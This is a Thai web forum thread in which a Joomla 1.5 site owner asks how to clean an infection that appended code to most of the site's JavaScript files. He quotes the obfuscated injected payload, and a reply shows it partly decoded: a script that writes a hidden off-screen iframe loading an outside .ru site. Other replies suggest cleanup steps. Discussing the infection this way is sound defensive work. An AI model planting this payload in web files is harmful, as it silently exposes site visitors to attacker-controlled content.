ต่อไป »

[jojyxword]

ตอนนี้ เว็บผม เจอไวรัสแบบแทรกโค๊ดอ่ะครับ

เท่าที่ดาวโหลดไฟล์ backup ลงมา พบว่า มันจะแทรก php บางไฟล์ (ไม่มาก)  แต่จะแทรกที่ไฟล์  .js เกือบทุกไฟล์เลยครับ
โดยจะแทรกท้ายๆของโค๊ดตลอด คือ โค๊ดไวรัส คือ

;document.write(unescape('%3C%73%63%72%69%70%74%3E%0A%76%61%72%20%5F%30%78%64%38%38%63%3D%5B%22%5C%78%33%43%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%32%30%5C%78%37%33%5C%78%37%34%5C%78%37%39%5C%78%36%43%5C%78%36%35%5C%78%33%44%5C%78%32%32%5C%78%37%30%5C%78%36%46%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%5C%78%33%41%5C%78%36%31%5C%78%36%32%5C%78%37%33%5C%78%36%46%5C%78%36%43%5C%78%37%35%5C%78%37%34%5C%78%36%35%5C%78%33%42%5C%78%32%30%5C%78%37%34%5C%78%36%46%5C%78%37%30%5C%78%33%41%5C%78%32%44%5C%78%33%35%5C%78%33%30%5C%78%33%38%5C%78%37%30%5C%78%37%38%5C%78%33%42%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%32%30%5C%78%37%33%5C%78%37%32%5C%78%36%33%5C%78%33%44%5C%78%32%32%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%36%44%5C%78%36%46%5C%78%37%36%5C%78%36%39%5C%78%36%35%5C%78%36%44%5C%78%36%35%5C%78%36%34%5C%78%36%39%5C%78%36%31%5C%78%37%33%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%64%38%38%63%5B%31%5D%5D%28%5F%30%78%64%38%38%63%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));

ไม่ทราบว่าท่านใด เคยเจอแนวนี้บ้างครับ 

ซึ่งตรงตำแหน่งสำคัญๆ ผมก็เข้าไปลบโค๊ดหมดแล้ว ตอนนี้เว็บใช้งานได้ปกติ

แต่เมื่อนำ backup หลังจากที่โดนไวรัส ดาวโหลดลงมา แล้วแกะ zip  Kaspersky A V ก็ทำการแจ้งทันที  ยาวเฟ้ยเลยครับ ไฟล์ที่ติดไวรัส

หลังจากที่พยายามเข้าไปแก้ไขทีละตัวๆ  ก็ชักจะไม่ไหว    ท่านใดมีวิธีดีๆ แนะนำบ้างไหมครับ   นอกจาก restore backup ครับ

CMS   Joomla 1.5
และใช้ DirectAdmin

ขอบคุณทุกท่านครับ
 

[goldxp]

ไวรัสบางตัวก็ใจดีบางตัวก็ใจร้ายครับ แต่แก้ joomla virus ร้องจ๊ากได้เลยเพราะจำนวนไฟล์เยอะมากครับ

สำหรับผม นอกจากจะค้นข้อความที่มีชื่อไวรัสหรือคำสั่งน่าสงสัยแล้ว
ผมจะตรวจดูวันที่เวลาที่แก้ไขล่าสุด (modified time) ไวรัสส่วนใหญ่ไม่ได้เข้าไป update ทุกไฟล์
นับว่าเป็นเรื่องโชคดี ทำให้เราพอจะเจาะกลุ่มว่าไฟล์ที่ถูกแก้ในวันที่ไหนเป็นกลุ่มเสี่ยงที่ว่าจะติดไวรัสครับ

[jojyxword]

ขอบคุณครับ +1

มีวิธีแก้ทีละหลายๆไฟล์ไหมครับ  แฮะๆ ตอนนี้่จะอ้วกละ 

[Mi-Duem]

ผมก็โดน มารอวิธีดีๆครับ และทางป้องกันด้วย

[phpwin]

ปรับ chmod ไฟล์เหล่านั้นให้เป็น 644 ครับ

[botnick]

โค๊ด:

<script>
var _0xd88c=["x3Cx64x69x76x20x73x74x79x6Cx65x3Dx22x70x6Fx73x69x74x69x6Fx6Ex3Ax61x62x73x6Fx6Cx75x74x65x3Bx20x74x6Fx70x3Ax2Dx35x30x38x70x78x3Bx22x3Ex3Cx69x66x72x61x6Dx65x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx6Dx6Fx76x69x65x6Dx65x64x69x61x73x2Ex72x75x2Fx22x3Ex3Cx2Fx69x66x72x61x6Dx65x3Ex3Cx2Fx64x69x76x3E","x77x72x69x74x65"];document[_0xd88c[1]](_0xd88c[0]);
</script>